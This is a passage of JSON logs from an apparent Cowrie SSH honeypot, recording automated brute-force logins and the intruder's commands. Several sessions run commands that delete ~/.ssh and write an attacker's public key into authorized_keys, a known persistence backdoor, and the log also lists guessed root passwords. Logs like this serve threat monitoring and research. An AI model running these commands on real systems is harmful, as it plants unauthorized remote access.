":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:20.666347Z","src_ip":"212.227.235.229","session":"e37d0e972562"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:46:21.813625Z","src_ip":"212.227.235.229","session":"e37d0e972562"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:22.091762Z","src_ip":"212.227.235.229","session":"e37d0e972562"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:22.092629Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46474,"dst_ip":"1.2.3.4","dst_port":22,"session":"0756a71b4c68","protocol":"ssh","message":"New connection: 212.227.235.229:46474 (1.2.3.4:22) [session: 0756a71b4c68]","sensor":"my-vps","timestamp":"2025-08-26T04:46:44.161721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:44.162583Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:44.424444Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.login.success","username":"root","password":"#qlalf#wiseit#qjsgh#","message":"login attempt [root/#qlalf#wiseit#qjsgh#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:46:45.514417Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:46:46.100364Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:46:46.101052Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:46:46.102095Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:46.365174Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:46:46.960380Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:46:46.961199Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:46:47.225457Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:47.226534Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58436,"dst_ip":"1.2.3.4","dst_port":22,"session":"430d58b22532","protocol":"ssh","message":"New connection: 212.227.235.229:58436 (1.2.3.4:22) [session: 430d58b22532]","sensor":"my-vps","timestamp":"2025-08-26T04:46:47.478596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:47.479622Z","src_ip":"212.227.235.229","session":"430d58b22532"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:47.731128Z","src_ip":"212.227.235.229","session":"430d58b22532"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:46:48.781514Z","src_ip":"212.227.235.229","session":"430d58b22532"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:50.036023Z","src_ip":"212.227.235.229","session":"430d58b22532"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58450,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6e9094cee1a","protocol":"ssh","message":"New connection: 212.227.235.229:58450 (1.2.3.4:22) [session: c6e9094cee1a]","sensor":"my-vps","timestamp":"2025-08-26T04:46:50.275868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:50.276770Z","src_ip":"212.227.235.229","session":"c6e9094cee1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:50.521147Z","src_ip":"212.227.235.229","session":"c6e9094cee1a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:46:51.540035Z","src_ip":"212.227.235.229","session":"c6e9094cee1a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:51.787061Z","src_ip":"212.227.235.229","session":"c6e9094cee1a"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:51.788309Z","src_ip":"212.227.235.229","session":"0756a71b4c68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3df265a14ad","protocol":"ssh","message":"New connection: 212.227.125.160:6100 (1.2.3.4:22) [session: a3df265a14ad]","sensor":"my-vps","timestamp":"2025-08-26T04:46:55.153311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T04:46:55.574821Z","src_ip":"212.227.125.160","session":"a3df265a14ad"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T04:46:55.992345Z","src_ip":"212.227.125.160","session":"a3df265a14ad"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T04:47:00.444401Z","src_ip":"212.227.125.160","session":"a3df265a14ad"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:00.446599Z","src_ip":"212.227.125.160","session":"a3df265a14ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47886,"dst_ip":"1.2.3.4","dst_port":22,"session":"66c23cfe8397","protocol":"ssh","message":"New connection: 212.227.235.229:47886 (1.2.3.4:22) [session: 66c23cfe8397]","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.157724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.159324Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.231162Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ss2023","message":"login attempt [root/P@ss2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.520747Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:47:05.682128Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.682795Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.683612Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:05.757295Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:47:06.021926Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.022871Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.099116Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.099947Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47900,"dst_ip":"1.2.3.4","dst_port":22,"session":"68610f4925ca","protocol":"ssh","message":"New connection: 212.227.235.229:47900 (1.2.3.4:22) [session: 68610f4925ca]","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.170941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.171788Z","src_ip":"212.227.235.229","session":"68610f4925ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.243759Z","src_ip":"212.227.235.229","session":"68610f4925ca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:47:06.575331Z","src_ip":"212.227.235.229","session":"68610f4925ca"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:07.650551Z","src_ip":"212.227.235.229","session":"68610f4925ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60342,"dst_ip":"1.2.3.4","dst_port":22,"session":"dabe18572fe2","protocol":"ssh","message":"New connection: 212.227.235.229:60342 (1.2.3.4:22) [session: dabe18572fe2]","sensor":"my-vps","timestamp":"2025-08-26T04:47:07.725133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:07.726031Z","src_ip":"212.227.235.229","session":"dabe18572fe2"}
